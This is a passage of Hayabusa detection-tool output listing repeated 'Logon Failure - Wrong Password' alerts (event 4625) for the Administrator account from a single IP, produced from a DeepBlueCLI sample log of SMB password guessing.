01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q29uj6ovfwz0riC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cj38VsqGLoQ8jGdf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOW8OIO2vQRFaTID : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfYITdZCYwEj9IJV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4BI6V35tZGZ1WGtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOF75n4aunKH9qxc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jsTFTCnFFBkhG5jP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qiwcKE2TQui2H8z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PZOCyXplWOCyKbFm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RhyaAhYB78nbh1Ig : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIJU9xbr1klIvvdE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLKVR3mW3g3utO4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNm4tVG8bV7e9gbB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JtU0PCr9K5DXFYV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CH3BWNPEWlw52Gb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vQTYqFKBz6YEWhF6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkj3u8ODgLD7xQ5R : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9uyze1uO0zuNNUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmL15i3edXHcUamI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7xjFRjv9rDhiXJ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6BmQhVEv8g7EKu1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOMmG87cDO1NFg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO55KfkORhxFORvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D64wDbqkqmzWuUSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sIDgNIlGA0cOkBOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i0kXPQ6s7CGe4QGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HW5jP389jmqSkzF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enhsof25BdDPcI2c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4acsPMLUJRrT7mmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hi1dzny6hpyr5N3d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RlPVBSnDMlE0QZaJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th72TwMoRXtDVWge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGTTiJSkErjzoUUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyzZwNLltF0cYnai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gYWVQ6mCqyBfDm3m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rg2x2lv9JeS5Bb6l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fU28NKC3WYxFGbMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUWDXgnogGDXizWj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXhAtnNcQKOIsuGS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cKfrJwI3OGdjL4af : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VdekC160hU7YzrK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enOBuzd6jwu8rZCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAjLjDlZSps5D49t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rY6CONLBVygSTnY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6FIHgz2yqqbD9zfV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d82RRXgSmZdnfa8I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xA3ZWnWc9CoGeKpm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvSYKi8KvEtnmSbs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IvxXI1u0AwtNHNSU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OFIy6Cps3Rm87Kqf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: slL3aPBnZl3lVJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O98P1oP3AU4lZp2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EZZ7wIJNZ0CG7fMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7RhwHCqXQytvcaom : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xumaxbBEMZqL6pPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ur1yZIwgB3ecNJGw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAuGcKYRcLe0z3bl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmMi0edfBJ8KoJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnoKbUb9jiqJD7t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hBeWGNkWTSp3nje8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2iwM6jPgNjZ3q5qb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xdkrA9Kwzero8eSk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tb2ZvuJMxOfsxIT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PBMBRPdATYpLNmyI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P1CKprAPSw4hgiBB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8qtzwuGJfQG4XB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: auOf2GwkoymLh4bC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YcMYQ4sA2GfMwCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YL1iM6WUtZIjIoTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7ruxdEGdeP3RLqF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZFXBpUJzafGYIggt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MC1K9nNLupH0NuSS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rVfBLm10US9II19 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SBhAVHHtR7lZ1C3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKuUH8lMELYHibxF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.338 